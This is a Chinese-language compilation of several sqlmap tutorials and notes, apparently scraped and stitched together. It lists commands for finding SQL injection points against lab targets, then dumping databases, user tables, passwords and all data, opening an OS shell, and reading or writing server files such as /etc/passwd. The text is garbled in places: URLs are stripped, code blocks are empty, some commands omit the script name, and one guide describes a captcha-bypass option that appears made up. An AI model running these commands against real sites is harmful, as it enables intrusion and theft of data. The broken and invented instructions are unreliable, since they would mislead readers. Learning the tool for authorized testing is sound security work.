sqlmap使用手记

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。

今天把我一直以来整理的sqlmap笔记发布上来供大家参考。

sqlmap简介sqlmap支持五种不同的注入模式：∙1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。

∙2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。

∙3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

∙4、联合查询注入，可以使用union的情况下的注入。

∙5、堆查询注入，可以同时执行多条语句的执行时的注入。

sqlmap支持的数据库有MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB检测注入基本格式sqlmap -u “/post.php?id=1″默认使用level1检测全部数据库类型sqlmap -u “/post.php?id=1″ –dbms mysql –level 3指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面）跟随302跳转当注入页面错误的时候，自动跳转到另一个页面的时候需要跟随302，当注入错误的时候，先报错再跳转的时候，不需要跟随302。

目的就是：要追踪到错误信息。

cookie注入当程序有防get注入的时候，可以使用cookie注入sqlmap -u “/shownews.asp” –cookie “id=11″ –level 2（只有level达到2才会检测cookie）从post数据包中注入可以使用burpsuite或者temperdata等工具来抓取post包sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数注入成功后获取数据库基本信息sqlmap -u “/post.php?id=1″ –dbms mysql –level 3 –dbs查询有哪些数据库sqlmap -u “/post.php?id=1″ –dbms mysql –level 3 -D test –tables查询test数据库中有哪些表sqlmap -u “/post.php?id=1″ –dbms mysql –level 3 -D test -T admin –columns查询test数据库中admin表有哪些字段sqlmap -u “/post.php?id=1″ –dbms mysql –level 3 -D test -T admin -C “username,password” –dumpdump出字段username与password中的数据其他命令参考下面从数据库中搜索字段sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password在dedecms数据库中搜索字段admin或者password。

sqlmap 用法SQLmap 是一个基于Python 开发的自动化SQL 注入工具，可以自动扫描并发现网站SQL 注入漏洞，进而进行攻击，获取目标站点的敏感信息。

SQLmap 的用法如下：1. 下载SQLmap 并解压缩。

2. 打开命令行，进入到SQLmap 的目录下。

3. 执行以下命令：./sqlmap.py -u " dbs其中，`-u` 参数指定了目标网站的URL，`dbs` 参数是告诉SQLmap 爆破网站的数据库名称。

4. SQLmap 即会自动扫描目标站点，探测是否存在SQL 注入漏洞，并且提供一个菜单让用户选择要进行哪些操作。

下面是一些常用的SQLmap 命令：- `-u` 用来指定目标URL。

- `dbs` 用来指定要爆破的数据库名称。

- `current-db` 用来显示当前所处的数据库名称。

- `tables` 用来显示指定数据库中的所有表。

- `columns` 用来显示指定表中的所有列。

- `dump` 用来下载指定数据库中的所有数据。

- `-p` 用来指定要测试的参数。

- `technique` 用来指定使用的SQL 注入技术。

- `level` 用来指定SQL 注入攻击的强度级别。

- `user-agent` 用来指定HTTP User-Agent。

- `cookie` 用来指定HTTP Cookie。

- `tamper` 用来指定修改SQL 注入攻击载荷的方法。

以上命令只是SQLmap 的一部分，完整的命令列表可以查看SQLmap 的帮助文档。

在使用SQLmap 时，需要谨慎操作，以免不小心删除或修改了网站的数据。

sqlmap的使用方法1. 简介sqlmap是一款开源的自动化SQL注入工具，用于发现和利用Web应用程序中的SQL 注入漏洞。

它具有强大的功能和灵活的配置选项，可帮助安全测试人员快速发现和利用SQL注入漏洞，从而提高Web应用程序的安全性。

2. 安装sqlmap可以在Windows、Linux和Mac OS X等操作系统上运行。

以下是sqlmap的安装步骤：2.1 Windows在Windows上安装sqlmap，您可以按照以下步骤进行操作：1.访问sqlmap的官方网站（[）。

2.点击页面右上方的“Code”按钮，并选择“Download ZIP”选项，将sqlmap的源代码下载到本地。

3.解压下载的ZIP文件到您希望安装sqlmap的目录。

4.打开命令提示符（CMD）并导航到解压后的sqlmap目录。

5.运行以下命令安装所需的依赖项：python setup.py install6.安装完成后，您可以在命令提示符中输入“sqlmap”命令来启动sqlmap。

2.2 Linux在Linux上安装sqlmap，您可以按照以下步骤进行操作：1.打开终端并输入以下命令来安装所需的依赖项：sudo apt-get install python3 python3-pip2.输入以下命令来安装sqlmap：sudo pip3 install sqlmap3.安装完成后，您可以在终端中输入“sqlmap”命令来启动sqlmap。

2.3 Mac OS X在Mac OS X上安装sqlmap，您可以按照以下步骤进行操作：1.打开终端并输入以下命令来安装Homebrew：/bin/bash -c "$(curl -fsSL "2.输入以下命令来安装Python 3和pip：brew install python33.输入以下命令来安装sqlmap：pip3 install sqlmap4.安装完成后，您可以在终端中输入“sqlmap”命令来启动sqlmap。

Sqlmap使⽤（必备命令）⼀、Sqlmap注⼊篇Sqlmap是⼀个专业的SQL注⼊⼯具，⽤法也很多，具体可以⽤"sqlmap -hh"查看完整的命令帮助⽂档，我这只是给⼤家分享⼀些最常⽤的Sqlmap⽤法。

1、检查注⼊点【get】 sqlmap -u "url"【post】sqlmap -u "url" --data="参数"【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince"【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1"2、爆所有数据库信息--dbs（爆所有数据库信息）【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince" --dbs【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1" --dbs--current-db（爆当前数据库信息）【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince" --current-db【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1" --current-db3、列出指定数据库所有的表名-D 数据库名 --tables例如：列出数据库名为pikachu的所有数据表【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince" -D pikachu --tables【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1" -D pikachu --tables4、列出指定表名的所有列名--columns 所有列名例如：数据库pikachu中users表所有字段名【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince" -D pikachu -T users --columns【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1" -D pikachu -T users --columns5、dump打印输出表名指定列名字段的值数据-C 指定需要显⽰数值的字段名，不指定默认显⽰全部字段例如：数据库pikachu中users表中username,password字段的值【get字符型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince" -D pikachu -T users -C username,password --dump【post数字类型】root@kali:/# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1" -D pikachu -T users -Cusername,password --dump6、Sqlmap -r 使⽤使⽤Fiddler或者Burp Suite抓包将get或者post请求保存为.txt⽂件，然后使⽤Sqlmap -r “txt⽂件路径”调⽤，这样就不⽤输⼊参数和cookie了。

sqlmap使⽤⼿册sqlmap使⽤⼿册输⼊“python sqlmap.py --version”检查sqlmap是否安装成功输⼊“python sqlmap.py -hh”， “-hh”参数⽤于查看sqlmap的使⽤说明输⼊“python sqlmap.py -u "http://192.168.117.135/xxx.php?xxx_id=1"”，其中“-u”参数⽤于指定注⼊点的URL。

输⼊“python sqlmap.py –u "http://192.168.117.135/ry.php?ry_id=1" --dbs”，其中参数“--dbs”⽤于列举数据库。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng --tables”，其中参数“-D”⽤于指定数据库名称，“--tables”参数⽤于列举表。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng -T root --columns”，其中参数“-T”⽤于指定表名称，“--columns”参数⽤于指定列出表中字段。

输⼊“python sqlmap.py -u "http://192.168.117.135/ry.php?ry_id=1" -D jnng -T root -C root_id,root_name,root_pass --dump”，其中参数“-C”⽤于指定字段名称，参数“—dump”⽤于导出数据。

--os-shell--file-read "/user/www/flag.php官⽅命令sqlmap -r http.txt #http.txt是我们抓取的http的请求包sqlmap -r http.txt -p username #指定参数，当有多个参数⽽你⼜知道username参数存在SQL漏洞，你就可以使⽤-p指定参数进⾏探测sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #当该⽹站需要登录时，探测该url是否存在漏洞sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data="uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填⼊sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #查看数据库的所有⽤户sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库⽤户名的密码sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的⽤户sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前⽤户是否有管理员权限sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员⾓⾊，仅适⽤于oracle数据库的时候sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #爆出所有的数据库sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables #爆出所有的数据表sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #爆出数据库中所有的列sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #爆出security数据库中users表中的所有的列sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump #爆出数据库security中的users表中的username列中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all #爆出数据库security中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all #爆出该数据库中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py #指定脚本进⾏过滤，⽤/**/代替空格sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #探测等级5，平台危险等级3，都是最⾼级别。

SQLMap 是一款开源的自动化 SQL 注入工具，它可以帮助安全人员快速发现和利用网站中的 SQL 注入漏洞。

以下是 SQLMap 的一些基本使用方法总结：
1. 确定目标：首先，你需要确定要测试的目标网站或应用程序的 URL。

2. 选择注入点：在目标网站上，选择一个你认为可能存在 SQL 注入漏洞的页面或表单。

通常，这些页面会接受用户输入，如用户名、密码、搜索框等。

3. 生成测试语句：使用 SQLMap，你可以生成各种类型的测试语句来尝试注入 SQL 命令。

可以通过指定注入点的参数名称和值来生成测试语句。

4. 执行测试：将生成的测试语句发送到目标网站，并观察返回的结果。

SQLMap 会根据返回的结果判断是否存在 SQL 注入漏洞，并尝试获取更多的信息。

5. 利用漏洞：如果发现了 SQL 注入漏洞，你可以使用 SQLMap 来进一步利用该漏洞。

例如，获取数据库中的敏感信息、修改数据、执行任意 SQL 命令等。

6. 报告漏洞：在完成测试和利用漏洞后，建议你向相关方报告发现的漏洞，以帮助他们修复问题并提高网站的安全性。

需要注意的是，SQLMap 的使用需要谨慎，并且应该仅在授权的环境下进行。

在进行任何安全测试之前，请确保你已经获得了合法的授权。

此外，SQLMap 可能无法适用于所有的网站和应用程序，因为一些网站可能采取了防护措施来防止 SQL 注入攻击。

sqlmap master工具新手使用方法SQLMap Master工具新手使用方法SQLMap Master是一款广泛使用的SQL注入检测和利用工具。

对于新手来说，熟悉其使用方法是非常重要的。

本文将详细介绍SQLMap Master的各种使用方法。

安装SQLMap Master1.首先，从SQLMap官方GitHub仓库下载SQLMap Master的源代码。

2.解压下载的压缩包到任意目录。

3.进入解压后的目录，在终端中输入python，如果没有报错提示，则表示安装成功。

基本使用方法1.打开终端，进入SQLMap Master的安装目录。

2.输入命令python -u [目标URL]，其中[目标URL]是要进行注入检测的网站URL。

3.SQLMap Master将自动进行注入检测，并显示检测结果。

SQLMap Master有许多参数选项，可以根据具体需求进行定制化配置。

基本选项•-u [URL]：指定目标URL。

•--data [DATA]：指定POST请求的数据。

•--cookie [COOKIE]：指定Cookie。

•--level [LEVEL]：指定注入检测的等级。

•--threads [THREADS]：指定使用的线程数。

技巧性选项•--dbms [DBMS]：指定目标数据库类型。

•--os [OS]：指定目标操作系统类型。

•--tamper [TAMPER]：指定注入检测时使用的特殊技巧。

高级功能SQLMap Master还提供了一些高级功能，可以进一步探测和利用注入漏洞。

数据库探测•--dbs：列举目标数据库的所有数据库。

•--dump：获取目标数据库的数据。

文件系统操作•--file-read [FILE]：读取目标服务器上指定文件的内容。

•--file-write [FILE]：在目标服务器上写入指定文件。

使用示例以下是SQLMap Master常用功能的使用示例。

基本检测python -u数据库探测python -u --dbs数据获取python -u -D dbname --dump文件系统操作python -u --file-read "/etc/passwd"总结SQLMap Master是一款功能强大的SQL注入检测和利用工具。

sqlmapmaster工具新手使用方法SQLMap是一款使用Python编写的开源渗透测试工具，用于自动化检测和利用SQL注入漏洞。

在使用SQLMap之前，我们需要先了解它的基本用法和工作原理。

一、安装SQLMap2.解压源码包，并进入解压后的目录。

3. 执行命令"python setup.py install"，安装SQLMap的依赖库。

二、使用SQLMap下面是一个简单的使用SQLMap的示例，帮助新手快速上手。

1.识别目标首先，我们需要识别目标网站是否存在SQL注入漏洞。

通过执行以下命令，SQLMap将发送一系列测试请求，以确定目标是否存在漏洞。

``````其中，"-u"参数用于指定目标URL，"--batch"参数用于批量处理所有请求，"--level"参数用于设置检测的深度，"--risk"参数用于设置检测的敏感性。

2.确认漏洞如果SQLMap成功检测到漏洞，将显示漏洞的详细报告，包括漏洞类型、数据库类型、操作系统等信息。

3.利用漏洞一旦确认目标存在SQL注入漏洞，我们可以利用SQLMap的自动化功能，自动提取数据库、表和列的信息。

``````其中，"--dbs"参数用于指定提取数据库信息。

4.导出数据通过以下命令，可以导出特定数据库、表和列的数据。

``````其中，"-D"参数用于指定数据库名称，"-T"参数用于指定表名称，"-C"参数用于指定列名称。

5.通过参数注入如果目标网站接受参数作为输入，我们可以使用"--data"参数，将参数传递给SQLMap进行注入检测。

``````其中，"--data"参数用于指定要注入的参数。

6.其他参数SQLMap还支持许多其他参数，用于定制和优化检测和利用过程。

史上最详细的sqlmap使用教程SQLMap是一个强大的SQL注入工具，以下是它的详细使用教程：一、概述SQLMap是一个自动化工具，用于检测和利用SQL注入漏洞。

通过使用SQLMap，用户可以绕过应用程序的安全措施，执行任意SQL命令，并获取敏感数据。

二、安装与配置1. 下载SQLMap：从官方网站下载最新版本的SQLMap。

2. 配置环境：根据您的操作系统和编程环境，确保已安装Python和必要的依赖项。

3. 设置代理：如果您的网络环境需要通过代理访问目标服务器，请配置好代理设置。

三、基本用法1. 扫描单个目标：使用以下命令扫描单个目标是否存在SQL注入漏洞：```csspython -u <目标URL> --dump-all```其中，`<目标URL>`是您要扫描的目标网址。

`--dump-all`参数用于提取所有数据库和表信息。

2. 扫描多个目标：如果您要扫描多个目标，可以将URL列表保存在文件中，并使用以下命令：```csspython -f <目标URL列表文件> --dump-all```3. 指定数据库类型：如果目标数据库类型已知，可以使用`--dbms`参数指定数据库类型。

例如：```csspython -u <目标URL> --dbms MySQL --dump-all```4. 使用特定的注入技巧：SQLMap支持多种注入技巧，如布尔型盲注、时间盲注、报错注入等。

您可以使用`--technique`参数指定特定的注入技巧。

例如：```csspython -u <目标URL> --technique=B --dump-all```其中，`B`表示布尔型盲注。

5. 绕过验证码：如果目标网站使用了验证码机制，您可以使用`--skip-captcha`参数绕过验证码。

例如：```csspython -u <目标URL> --skip-captcha --dump-all```6. 使用自定义请求头：如果目标服务器要求特定的请求头信息，您可以使用`--headers`参数自定义请求头。